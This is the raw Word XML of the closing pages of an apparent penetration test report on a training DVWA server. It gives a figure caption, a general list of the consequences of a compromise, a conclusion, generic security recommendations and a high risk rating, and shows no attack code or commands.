                            <a:schemeClr val="accent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20B27" id="Flowchart: Alternate Process 480" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:.75pt;margin-top:397.35pt;width:314.25pt;height:8.2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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A5F5343" wp14:editId="4DA31D0A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-38100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3369945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1314450" cy="104775"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="479" name="Flowchart: Alternate Process 479"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1314450" cy="104775"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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EB169" id="Flowchart: Alternate Process 479" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-3pt;margin-top:265.35pt;width:103.5pt;height:8.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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>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2B545D85" wp14:editId="5626B61E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3074669</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="352425" cy="104775"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="478" name="Flowchart: Alternate Process 478"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="352425" cy="104775"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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ED7B9" id="Flowchart: Alternate Process 478" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:242.1pt;width:27.75pt;height:8.2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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="670EE5F2" wp14:editId="45C1160B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-28574</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2579371</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="477" name="Flowchart: Alternate Process 477"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="914400" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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CCA2B" id="Flowchart: Alternate Process 477" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-2.25pt;margin-top:203.1pt;width:1in;height:9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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49C0572B" wp14:editId="4074A37A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-28575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2084071</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="800100" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="476" name="Flowchart: Alternate Process 476"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="800100" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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4AA56" id="Flowchart: Alternate Process 476" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-2.25pt;margin-top:164.1pt;width:63pt;height:9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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29364C3E" wp14:editId="51B66C28">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-28575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1026796</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1038225" cy="133350"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="475" name="Flowchart: Alternate Process 475"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1038225" cy="133350"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:schemeClr val="accent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2FFCC" id="Flowchart: Alternate Process 475" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-2.25pt;margin-top:80.85pt;width:81.75pt;height:10.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" filled="f" strokecolor="#c45911 [2405]" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D359D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C496A8" wp14:editId="18059D3E">
            <wp:extent cx="3536950" cy="3354850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="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6.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="14189" r="38896" b="8534"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3583826" cy="3399313"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B4517E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DC74BB" wp14:editId="18B778E3">
            <wp:extent cx="5816600" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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7.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="42710" r="2112" b="8346"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5818044" cy="2181767"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE8D5D9" w14:textId="62110322" w:rsidR="000218FA" w:rsidRDefault="00323960" w:rsidP="000218FA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Viewing the record added during the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77753F80" w14:textId="77777777" w:rsidR="00547D43" w:rsidRDefault="00547D43" w:rsidP="000218FA"/>
    <w:p w14:paraId="160D7149" w14:textId="77777777" w:rsidR="00547D43" w:rsidRDefault="00547D43" w:rsidP="000218FA"/>
    <w:p w14:paraId="41B20A8A" w14:textId="1AB81507" w:rsidR="000218FA" w:rsidRDefault="006A3099" w:rsidP="000218FA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This proves that any remote attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E4161D">
        <w:t xml:space="preserve">can exploit Websters </w:t>
      </w:r>
      <w:r w:rsidR="00580981">
        <w:t xml:space="preserve">DVWA server </w:t>
      </w:r>
      <w:r w:rsidR="00A412EE">
        <w:t xml:space="preserve">easily if the security level is set to </w:t>
      </w:r>
      <w:r w:rsidR="00A412EE" w:rsidRPr="00A412EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidR="002A6095" w:rsidRPr="002A6095">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00547D43">
        <w:t xml:space="preserve"> The attacker can perform the following if Websters DVWA server is compromised: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49384C1A" w14:textId="639D707A" w:rsidR="00A2286A" w:rsidRDefault="00317EDC" w:rsidP="00317EDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A2286A">
        <w:t>amper with crucial data</w:t>
      </w:r>
      <w:r w:rsidR="003D3394">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B5E06" w14:textId="5598B8AD" w:rsidR="00A23C93" w:rsidRDefault="003D3394" w:rsidP="00317EDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sell </w:t>
      </w:r>
      <w:r w:rsidR="00E141A6">
        <w:t xml:space="preserve">the data to </w:t>
      </w:r>
      <w:r w:rsidR="000C6027">
        <w:t>opponent</w:t>
      </w:r>
      <w:r w:rsidR="00E141A6">
        <w:t xml:space="preserve"> part</w:t>
      </w:r>
      <w:r w:rsidR="000C6027">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00E141A6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10156A6A" w14:textId="60DF07CE" w:rsidR="00E141A6" w:rsidRDefault="00421C63" w:rsidP="00317EDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ask websters for Ransomware</w:t>
      </w:r>
      <w:r w:rsidR="00BB04C8">
        <w:t xml:space="preserve"> and lock them out of their DVWA server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84992E" w14:textId="372E7689" w:rsidR="00421C63" w:rsidRDefault="00DA7100" w:rsidP="00317EDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Delete all the data</w:t>
      </w:r>
      <w:r w:rsidR="006E3471">
        <w:t xml:space="preserve"> and redundancies permanently</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819D876" w14:textId="00821B25" w:rsidR="00DA7100" w:rsidRDefault="00DA7100" w:rsidP="00317EDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target </w:t>
      </w:r>
      <w:r w:rsidR="00237576">
        <w:t xml:space="preserve">specific customers for a bigger impact. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE434D7" w14:textId="77777777" w:rsidR="00547D43" w:rsidRDefault="00547D43" w:rsidP="000218FA"/>
    <w:p w14:paraId="570A07F8" w14:textId="77777777" w:rsidR="00547D43" w:rsidRPr="002A6095" w:rsidRDefault="00547D43" w:rsidP="000218FA"/>
    <w:p w14:paraId="172847BE" w14:textId="0B0C846B" w:rsidR="00E961CD" w:rsidRDefault="00E961CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B2463E" w14:textId="7DABFB39" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc41839638"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="103D8C39" w14:textId="77777777" w:rsidR="0028153C" w:rsidRPr="003859E6" w:rsidRDefault="0028153C" w:rsidP="0028153C"/>
    <w:p w14:paraId="24391610" w14:textId="57D170AE" w:rsidR="0028153C" w:rsidRDefault="001D5EDE" w:rsidP="0028153C">
      <w:r>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r w:rsidR="003263C4">
        <w:t>penetration test, Websters has faced numerous security failures</w:t>
      </w:r>
      <w:r w:rsidR="0028153C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000905BB">
        <w:t xml:space="preserve">These vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00CA34A7">
        <w:t>will in time lead to Websters losing complete control over their DVWA</w:t>
      </w:r>
      <w:r w:rsidR="006F24E8">
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:r w:rsidR="00CA34A7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00870AF3">
        <w:t xml:space="preserve">The functioning of the company will be affected </w:t>
      </w:r>
      <w:r w:rsidR="009648DA">
        <w:t xml:space="preserve">extremely </w:t>
      </w:r>
      <w:r w:rsidR="001D4C87">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidR="00A1072E">
        <w:t>these vulnerabilities are used</w:t>
      </w:r>
      <w:r w:rsidR="001D4C87">
        <w:t xml:space="preserve"> by a malicious hacker or third party.</w:t>
      </w:r>
      <w:r w:rsidR="0028153C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A63075">
        <w:t xml:space="preserve">The current system of maintaining and deploying </w:t>
      </w:r>
      <w:r w:rsidR="009F021E">
        <w:t>security techniques will not be adequate enough for Websters to be secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1035DC" w14:textId="2B5671DF" w:rsidR="0028153C" w:rsidRDefault="00A347D5" w:rsidP="0028153C">
      <w:r>
        <w:t>The goal of this penetration test was as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF0ECA" w14:textId="5E081A03" w:rsidR="0028153C" w:rsidRDefault="009829D9" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To determine if Websters </w:t>
      </w:r>
      <w:r w:rsidR="00C63215">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ould lose complete control over their DVWA </w:t>
      </w:r>
      <w:r w:rsidR="003B5E91">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="00132A04">
        <w:t xml:space="preserve">an attacker had </w:t>
      </w:r>
      <w:r w:rsidR="003B5E91">
        <w:t>access to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B173B5E" w14:textId="37DE6141" w:rsidR="0028153C" w:rsidRDefault="00616757" w:rsidP="0028153C">
      <w:r>
        <w:t>The main goal was successfully a</w:t>
      </w:r>
      <w:r w:rsidR="00D078D9">
        <w:t>chieved in this penetration test.</w:t>
      </w:r>
      <w:r w:rsidR="0028153C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497A7D">
        <w:t xml:space="preserve">Many </w:t>
      </w:r>
      <w:r w:rsidR="001A520C">
        <w:t xml:space="preserve">trivial security issues can generally be disregarded but in future, those could </w:t>
      </w:r>
      <w:r w:rsidR="00A23576">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="001A520C">
        <w:t xml:space="preserve">leveraged and </w:t>
      </w:r>
      <w:r w:rsidR="00A23576">
        <w:t xml:space="preserve">exploited easily. </w:t>
      </w:r>
      <w:r w:rsidR="00A729AF">
        <w:t>With access to the database credentials and the database</w:t>
      </w:r>
      <w:r w:rsidR="004F7B2F">
        <w:t xml:space="preserve"> to a remote attacker</w:t>
      </w:r>
      <w:r w:rsidR="00A729AF">
        <w:t>, Websters will, in time</w:t>
      </w:r>
      <w:r w:rsidR="0080183C">
        <w:t>, lose all their crucial data and the control over it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D52C7" w14:textId="77777777" w:rsidR="0028153C" w:rsidRPr="00A4573D" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D56AB" w14:textId="77777777" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc41839639"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="37A27E57" w14:textId="77777777" w:rsidR="0028153C" w:rsidRPr="003859E6" w:rsidRDefault="0028153C" w:rsidP="0028153C"/>
    <w:p w14:paraId="4AF2DFC3" w14:textId="014005BF" w:rsidR="004F7B2F" w:rsidRDefault="00107838" w:rsidP="0028153C">
      <w:r>
        <w:t>Wilson Security</w:t>
      </w:r>
      <w:r w:rsidR="002B710F">
        <w:t xml:space="preserve"> has concluded that this penetration test report has in detail determined </w:t>
      </w:r>
      <w:r w:rsidR="00606750">
        <w:t>the impact of an attack where Websters DVWA server is hacked</w:t>
      </w:r>
      <w:r w:rsidR="00EF235A">
        <w:t>, to reduce the magnitude, timely measures must be taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736D9C1A" w14:textId="45FDB707" w:rsidR="0028153C" w:rsidRDefault="004F7B2F" w:rsidP="0028153C">
      <w:r>
        <w:t>Wilson</w:t>
      </w:r>
      <w:r w:rsidR="0028153C">
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:r w:rsidR="00107838">
        <w:t>suggests the following steps be taken</w:t>
      </w:r>
      <w:r w:rsidR="0028153C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE0AEB" w14:textId="3249A3C3" w:rsidR="009F7A61" w:rsidRDefault="009D6B52" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make sure to use </w:t>
      </w:r>
      <w:r w:rsidR="00D2666F">
        <w:t>strong credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4796910C" w14:textId="0ACC707B" w:rsidR="009F7A61" w:rsidRDefault="00C5296F" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective </w:t>
      </w:r>
      <w:r w:rsidR="0022111D">
        <w:t>reliance strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFA6330" w14:textId="4A341D92" w:rsidR="009F7A61" w:rsidRDefault="00E23499" w:rsidP="00FE711F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impose and </w:t>
      </w:r>
      <w:r w:rsidR="00FE711F">
        <w:t>execute risk controls and mitigation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F3711" w14:textId="5D15E8C6" w:rsidR="00FE711F" w:rsidRDefault="004113C4" w:rsidP="00FE711F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:r w:rsidR="006C7A23">
        <w:t>vulnerability assessments as regularly as possible</w:t>
      </w:r>
      <w:r w:rsidR="00374C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BC986" w14:textId="77777777" w:rsidR="006C7A23" w:rsidRDefault="006C7A23">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9454D" w14:textId="0BC9ED81" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc41839640"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2BE460A8" w14:textId="77777777" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C"/>
    <w:p w14:paraId="4069138B" w14:textId="0A2D23DF" w:rsidR="00A9627C" w:rsidRDefault="00A9627C" w:rsidP="0028153C">
      <w:r>
        <w:t xml:space="preserve">In this penetration test report, it has been discovered that </w:t>
      </w:r>
      <w:r w:rsidR="00E02379">
        <w:t xml:space="preserve">the probability of Websters being attacked is </w:t>
      </w:r>
      <w:r w:rsidR="00E02379" w:rsidRPr="007C38BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r w:rsidR="00E02379">
        <w:t>. The attacker can straight away</w:t>
      </w:r>
      <w:r w:rsidR="007C38BD">
        <w:t xml:space="preserve"> get the whole control of DVWA database i</w:t>
      </w:r>
      <w:r w:rsidR="005809DB">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="007C38BD">
        <w:t xml:space="preserve"> the web server is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25BD1E" w14:textId="77777777" w:rsidR="0028153C" w:rsidRPr="003859E6" w:rsidRDefault="0028153C" w:rsidP="0028153C"/>
    <w:p w14:paraId="6BD50E40" w14:textId="77777777" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:pPr>
        <w:rPr>
